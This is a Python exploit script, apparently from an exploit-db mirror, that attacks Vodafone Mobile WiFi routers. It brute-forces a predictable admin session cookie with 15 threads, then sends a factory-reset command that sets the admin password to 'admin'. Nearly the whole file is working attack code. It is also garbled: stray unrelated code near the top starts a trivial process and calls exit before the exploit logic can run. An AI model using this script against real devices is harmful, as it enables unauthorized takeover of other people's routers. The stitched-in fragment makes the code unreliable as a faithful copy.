exploit-db-mirror/platforms/hardware/webapps/40357.py

import urllib2
import json
from datetime import datetime, timedelta
import time
import httplib
from threading import Thread
from Queue import Queue
from multiprocessing import process


print """
Vodafone Mobile WiFi - Password reset exploit (Daniele Linguaglossa)
"""
thread_lock = False
session = ""
def unix_time_millis(dt):
    epoch = datetime.utcfromtimestamp(0)
    return int(((dt - epoch).total_seconds() * 1000.0) / 1000)

a=False

def check_process_output():
    print 1

p = process.Process(target=check_process_output)
p.start()

print a
exit(0)

def crack(queue):
    global thread_lock
    global session
    while True:
        if thread_lock:
            exit(0)
        if not queue.empty():
            cookie = queue.get()
            headers = {'Referer': 'http://192.168.0.1/home.htm', 'Cookie': "stok=%s" % cookie}
            req = urllib2.Request("http://192.168.0.1/goform/goform_get_cmd_process?cmd=AuthMode&_=%s"
                                          % time.time(), None, headers)
            result = urllib2.urlopen(req).read()
            if json.loads(result)["AuthMode"] != "":
                print "[+] Found valid admin session!"
                print "[INFO] Terminating other threads ... please wait"
                session = cookie
                queue.task_done()
                thread_lock = True


def start_threads_with_args(target, n, arg):
    thread_pool = []
    for n_threads in range(0, n):
        thread = Thread(target=target, args=(arg,))
        thread_pool.append(thread)
        thread_pool[-1].start()
    return thread_pool

def start_bruteforce():
    global session
    global thread_lock
    queue = Queue(0)
    start_threads_with_args(crack, 15, queue)
    print"[!] Trying fast bruteforce..."
    for x in range(0, 1000):
        if thread_lock:
            break
        queue.put("123abc456def789%03d" % x)
    while True:
        if session != "":
            return session
        if queue.empty():
            break
    print "[!] Trying slow bruteforce..."
    for milliseconds in range(0, how_many):
        if thread_lock:
            break
        queue.put("123abc456def789%s" % (start + milliseconds))
    while True:
        if session != "":
            return session
        if queue.empty():
            break
    return session
if __name__ == "__main__":
    now = datetime.now()
    hours = raw_input("How many hours ago admin logged in: ")
    minutes = raw_input("How many minutes ago admin logged in: ")
    init = datetime(now.year, now.month, now.day, now.hour, now.minute) - timedelta(hours=int(hours), minutes=int(minutes))
    end = datetime(now.year, now.month, now.day, 23, 59, 59, 999999)
    start = unix_time_millis(init)
    how_many = unix_time_millis(end) - start + 1
    print "[+] Starting session bruteforce with 15 threads"
    valid_session = ""
    try:
        valid_session = start_bruteforce()
    except KeyboardInterrupt:
        print "[-] Exiting.."
        thread_lock = True
        exit(0)
    if valid_session == "":
        print "[!] Can't find valid session :( quitting..."
        exit(0)
    print "[+] Resetting router password to 'admin' , network may be down for a while"
    headers = {'Referer': 'http://192.168.0.1/home.htm', 'Cookie': "stok=%s" % valid_session}
    req = urllib2.Request("http://192.168.0.1/goform/goform_set_cmd_process",
                          "goformId=RESTORE_FACTORY_SETTINGS&_=%s" % time.time(), headers)
    try:
        urllib2.urlopen(req).read()
    except httplib.BadStatusLine:
        print "[!] Password resetted to admin! have fun!"
        exit(0)
    except Exception:
        print "[x] Error during password reset"
    print "[-] Can't reset password try manually, your session is: %s" % valid_session